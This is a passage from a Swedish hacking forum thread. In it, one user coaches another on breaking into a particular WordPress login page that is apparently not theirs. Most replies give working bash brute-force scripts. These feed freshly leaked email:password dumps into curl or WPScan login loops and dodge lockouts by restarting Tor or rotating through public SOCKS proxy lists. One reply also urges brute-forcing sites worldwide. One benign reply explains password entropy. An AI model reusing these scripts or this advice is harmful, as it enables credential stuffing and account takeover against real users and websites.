2022-07-19, 01:30
  #25
Bannlyst
Citat:
--disable-tls-checks

Löste det.
__________________
Senast redigerad av TrixNe 2022-07-19 kl. 01:39.
Citera
2022-07-19, 01:48
  #26
Bannlyst
Citat:
Ursprungligen postat av TrixNe
Text fil öppen, och hemsidan som jag försöker logga in på är öppen på skärmen.

Spelar in mus och tangentbordet.

Klipper ut första raden från text filen, trycker delete för att nästa rad ska komma längst upp, sparar filen och klistrar in ordet som jag klippte ut där lösenordet ska vara och klickar enter.

Sen är det repeat fast då är nästa ord längst uppe.

Lyckats att få till 1 lösenord i sekunden men ja, det är segt.

Ska försöka googla lite hur man kan göra det snabbare, datorn krånglar så kali linux drar inte igång försökt massa gånger. Virtuell maskin funkar inte heller på denna sketna dator

Aha shit, det var verkligen en udda metod, men vilken grej.
Citera
2022-07-19, 01:49
  #27
Bannlyst
WPscan testet. Efter några försök blir man blockad.

DVD det var det.
Citera
2022-07-19, 01:50
  #28
Bannlyst
Citat:
Ursprungligen postat av TrixNe
WPscan testet. Efter några försök blir man blockad.

DVD det var det.

Byt ip efter X antal försök, lägg te.x om det är 50 försök.-

for attempts in {0..50}; do wpscan.....; /etc/init.d/tor restart; done

För parallel, använd:

Kod:
seq 100|parallel -jX wpscan

För 100 attack per gång.

Vill du göra det via en while loop, se här. Ändra FTP till HTTP bara.

http://www.nr1.nu/linux/#bruteforce-...counts-at-once

Om man inte orkar besöka sidan:

Kod:
# Author: wuseman
# Desc: Bruteforce 2 accounts at once

okMSG() {
    echo -e "[\e[1;32m*\e[0m] $*"
}

errMSG() {
    echo -e "[\e[1;31m*\e[0m] $*"
}


1() {
    curl ftp://host:port -u $line &> /dev/null
    [[ $? = "0" ]] &&  okMSG "Cracked password for $line" || errMSG "Bad password for $line"
}

2() {
    curl ftp://host:port -u $line1 &> /dev/null -u $line1 &> /dev/null
    [[ $? = "0" ]] &&  okMSG "Cracked password for $line1" || errMSG "Bad password for $line1"
}

while 
    read line;read line1; 
    do 
    1;2;sleep 0.1;
done < test
__________________
Senast redigerad av wuseman 2022-07-19 kl. 01:53.
Citera
2022-07-19, 01:53
  #29
Bannlyst
Citat:
Ursprungligen postat av wuseman
Byt ip efter X antal försök, lägg te.x om det är 50 försök.-

for attempts in {0..50}; do wpscan.....; /etc/init.d/tor restart; done

Fattar i teorin men hur får man tag på 100 000 ip adresser gratis?
Citera
2022-07-19, 01:53
  #30
Bannlyst
Citat:
Ursprungligen postat av TrixNe
Fattar i teorin men hur får man tag på 100 000 ip adresser gratis?

Du provar 50 gånger per ip. Eller så använder du öppna socks proxys.

Har masser här: https://pastebin.com/raw/AW17wH1j

Jag föder väl inte en hacker här nu med allt, funka wordlisten eller blir det ingen träff? Testa isåfall att dra ner den senaste dumpen och ta lösenorden därifrån. Te.x:

Kod:
curl -sL https://www.upload.ee/download/14288021/28aa55cc113c1b5c8d3a/8.2K_MIX.txt \
    |awk -F: '{print $2}'

En dump från 13h sen, ta inga ordlistor, ta dumpar så får du äkta lösenord. Sannolikheten är extremt mycket större att du lyckas så.

Du kan använda min while loop till att läsa 2 rader per gång, så kan du ta 2 rader per gång från proxy listan:

Kod:
curl --socks5 ip:port ...whateverSITE.com

Försöker du logga in på https://adrress.com/wp-admin?

Skulle du vilja attackera direkt från den listan så är det ingen konst, du får sortera ut user + password och sedan attackera i en loop.

Kod:
users=$(curl -sL https://www.upload.ee/download/14288...a/8.2K_MIX.txt \
    |awk -F: '{print $1}')
passwords=$(curl -sL https://www.upload.ee/download/14288...a/8.2K_MIX.txt \
    |awk -F: '{print $2}')

Fixa nu en site och bruteforce tool så kan du attackera första bästa siten, sannolikheten att du lyckas hacka ett konto är 97.7% på spotify, gmail, rdp eller ssh med säker statistik. wordpress har jag aldrig räknat på eller fört statistik på dock. Men beroende på version och tema så kan dom vara vulnerable.

Såhär exakt, nu vet jag inte hur wpscan funkar men vi leker att man loggar in med --user och --password

Kod:
#!/bin/bash

# Senaste dumpen from sqli.cloud
wget https://www.upload.ee/download/14288...a/8.2K_MIX.txt

# Simpel while loop
while read line; do 
# Ta allting före "mail:password"  dvs mail addressen.
user=$(echo $line|awk '{print $1}')
# Ta alling efter :, dvs lösenordet:
passworrd=$(echo $line|awk '{print $2}')
# Om det nu skulle vara såhär det funka te.x
#  wpscan --user ${user} --password ${password} wpssite.com
# Testa direkt om du har en ftp, så är den i rullning. 
curl ftp://localhost:21 -u $user:$password 
done < 8.2K_MIX.txt

Där har du en färdig bruteforcer, sen får du styla till det lite om värdet är true dvs 0 så skriv ut:

Kod:
printf '%s\n' "[+] password cracked for $user:$password"
else
printf '%s\n' "[-]  $user:$password"

Gör det enkelt.
__________________
Senast redigerad av wuseman 2022-07-19 kl. 02:13.
Citera
2022-07-19, 02:16
  #31
Bannlyst
Jag ska kika in allt du skrev imorgon.

Ja det är hemsida.se/wp-login.php jag försöker komma in i.

Är inte så kunnig men kan lite om datorer och så där.
Citera
2022-07-19, 03:05
  #32
Bannlyst
Citat:
Ursprungligen postat av TrixNe
Jag ska kika in allt du skrev imorgon.

Ja det är hemsida.se/wp-login.php jag försöker komma in i.

Är inte så kunnig men kan lite om datorer och så där.

Det löser du lätt, om inte annat kör på macron! Men menar du att du sitter och trycker manuellt?

Det som jag gav dig funkar, körde på mig själv se här, jag la in ett random pass på mig själv på slutet, du ser att det blev grönt, hade det funnits 10 andra konton på min temporära ftp som matchade det bliivit grönt med sedan får man bara lägga det i en logg, alltså det som blir godkänt kan du sortera sexigt och styra upp i en logg så har du det perfekt sen. Se här så kan du se lite hur man gör. Du kan byta curl som sagt till mycket mer avancerat och attackera din egen wordpress site för det är vad du gör antar jag, no illegal hacking here! Det är för att prova på sig själv jag visar snabbt. Manuellt blir ju lite segt.. Högerklicka och tryck open video in a new tab om det är smått.

https://i.imgur.com/d41118Z.mp4

Börja enkelt. Börja inte med parallel bruteforcing dit är det långt om du är helt ny det är en helt annan grej. Det går tillräckligt fort på en tråd, sätt upp en apache eller nginx server med login eller ftp och prova på dig själv, läs loggarna och se vad som sker så du vet vad som händer på andra sidan såklart, ett tips bara men gör det som du tycker är bäst, macro kanske är bättre jag vet inte vad de är men OM det är manuellt så har du en början här iaf för att inte använda manuellt de blir segt i längden.

Lycka till!
__________________
Senast redigerad av wuseman 2022-07-19 kl. 03:15.
Citera
2022-07-19, 03:17
  #33
Bannlyst
Citat:
Ursprungligen postat av wuseman
Det löser du lätt, om inte annat kör på macron! Men menar du att du sitter och trycker manuellt?

Nej, inte manuellt.

Jag gjorde det en gång, spelade in det med ett program som heter TinyTask, sen är det bara trycka play så kör den själv.

Men har pausat lite nu ska sova lite.

Ska kolla in dey du skrev när jag vaknar och leka lite mer med WPScan intressant litet verktyg.
Citera
2022-07-19, 03:21
  #34
Bannlyst
Citat:
Ursprungligen postat av TrixNe
Nej, inte manuellt.

Jag gjorde det en gång, spelade in det med ett program som heter TinyTask, sen är det bara trycka play så kör den själv.

Men har pausat lite nu ska sova lite.

Ska kolla in dey du skrev när jag vaknar och leka lite mer med WPScan intressant litet verktyg.

Okej, ahh jag fattar inte hur den läser av ordlistan men men, gör så!

Edit: Ahh, du försökte logga in på sidan via webläsaren eller och inte via en vanlig POST typ? Ah då fattar jag, det är effektivt på vissa siter te.x på på flashback och facebook te.x som har kyrpterade cookies men det tar väl en jävla tid, då kan man attackera apin eller messenger appen eller facebooken där har dom visst glömt att använda krypterade cookies te.x, det är bara för att dra exempel men man skall ju inte attackera siter såklart men flashback har iaf skött sig det har inte facebook, det är YTTERST få som sagt som blockar efter X antal försöker. Alla tror det är så och fungerar så och det trodde jag med, tills jag fick veta sanningen efter en poolare provade lkite här och där och bara skicka login för att se hur många försök som tilläts, du får köra på oändligt nästan på alla siter. Dom skiter i vilkt, därför skall dom sitta bakom galler det är ju dom som läcker allas lösenord, alla dåliga admins alltså men dom kan läcka 1 miljard kinesiska konton och skylla på "den mänskliga faktorn" jävla svin så därför har jag ingen empati för dessa admins på ANDRA ställen dvs som inte har skydd men vem fan bryr sig om dom om dom inte bryrr sig om oss, SÄNK DOM ALLIHOP sålänge dom fortsätter att köpa en cpanel, upp med en site och sedan är dom nöjda. DOm har ingen aning om vad dom gör,. Inte en jävla site har bra skydd knappt längre de är som sagt tidigare biljett.nu(ticketmaster) och flashback så vitt jag vet, just try on yourself. Alla blir hackade det finns ingen som inte blir det, det är hur man hanterar det EFTERÅT som bevisar på vilka som är bra och inte, bruteforce hela världen så dom lär sig. Tror du dom gör det? Knappast, dom läser inte ens loggarna dom flesta. lol så kör på och ligg inte med 3s mellan varje varv den ända som förlorar på det är du. Blir du bannad så byt ip.

https://github.com/rdavydov/proxy-li...oxies/http.txt

^ Uppdateras med nya proxies var trettionde minut, senaste uppdateringen för 2 minuter sen. Har du curl så kan du använda nedan och lägga i cronie så hämtar du var 30e minut så har du snart ett par tusen att välja mellan (använd wsl om inte annat):

Kod:
curl https://github.com/rdavydov/proxy-list/blob/main/proxies/http.txt \
   |grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" 

Det är alltid en vän som provar för mig, jag bara säger det ifall om någon tror något annat det är extremt viktigt.

PS: Wordlists är ypperligt att hämta så som jag visade tidigare, då får du äkta lösenord istället för en massa random words som aldrig funkar. Detta funkar, som sagt. Gör det lätt.

Natti, lycka till.
__________________
Senast redigerad av wuseman 2022-07-19 kl. 03:41.
Citera
2022-07-19, 13:02
  #35
Medlem
BlackFuriousRavens avatar
Citat:
Ursprungligen postat av SilentVictory
Visst, men inget hindrar en angripare från att testa kombinationer i all oändlighet eller köra hashade lösenord mot en ordbok eller Rainbow Tables om man kommer åt och tar en databasdump.
Antingen angriparen själv, eller någon annan som köpt dessa dumpar via DarkWeb eller andra sajter.

Citat:
Ursprungligen postat av xpqr12345
Syftet med att låta (kräva) att användarna kan ha många olika tecken i sina lösenord är att det ökar antalet möjliga kombinationer väldigt mycket.

Vi kan leka lite med möjligheterna:

- vi kräver ett lösenord med två tecken, och tillåter bara siffor
- vi har då 100 (10^2) olika kombinationer

Ovanstående är en möjlighet. Den är helt orealistisk, men fungerar för att visa principen. Men vad händer om vi ökar de tillåtna tecknena med ett? Och vad händer om vi istället ökar längden på lösenordet?

- Om vi tillåter de tio siffrorna och ett tecken till så har vi 121 (11^2) olika lösenord
- Om vi istället ökar längden på lösenordet så får vi 1000 (10^3) olika möjligheter.

Än då länge ser det ut som att vi tjänar på att öka längden på lösenordet, men vad händer om vi ökar de tillåtna tecknen långt mer än bara med ett? Vad skulle hända om vi tillät 105 tecken? Då blir uträkningarna så här:

- med två tecken i lösenordet får vi 11025 olika möjliga lösenord.
- med tre tecken i lösenordet får vi 1157625 olika möjliga lösenord.

Genom att tillåta fler olika tecken i lösenordet ökar du mängden möjliga lösenord väldigt snabbt, långt snabbare än genom att öka lösenordens längd.


------------

I mina exempel ovan fick jag fram talet 105 enligt följande:
- det finns tio siffror
- från a till ö är 29 bokstäver
- från A till Ö är 29 bokstäver
- man kan enkelt skriva 37 olika andra tecken på ett svenskt tangentbord.
Detta ger 105 olika tecken.

Man kan dock "skriva" fler tecken, om operativsystemet tillåter det. Då kan man komma (långt) över 105 olika tecken i lösenorden, och mängden arbete en hacker måste göra ökar exponentiellt.


Jag förstår att antalet möjliga kombinationer ökar om man blandar stora och små bokstäver med siffror och andra tecken.

Men jag tror jag förstår resten också nu. Man kan komma runt blockeringen typ "du kan inte skriva lösenordet fler gånger nu pga fem felaktiga försök" genom att få tag i databasen och göra det vid sidan om. Då finns inte den blockeringen och man kan fortfarande veta när man fått rätt lösenord och när man väl fått det, kan man gå tillbaka till den riktiga sidan och skriva in det.
Citera
2022-07-19, 13:02
  #36
Medlem
Citat:
Ursprungligen postat av TrixNe
Jag ska kika in allt du skrev imorgon.

Ja det är hemsida.se/wp-login.php jag försöker komma in i.

Är inte så kunnig men kan lite om datorer och så där.
Kanske lite offtopic men ändå:
Om man hittar att sidan har cron.php, dvs eksisterar hemsida.se/cron.php

kan detta då utnyttjas på något sätt?

Du har ej rätt att acessa denna sidan brukar det komma upp i såna fall,men tänkte att man ändå på nåt vis skulle kunna få servern att köra ens eget crontab-script?
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in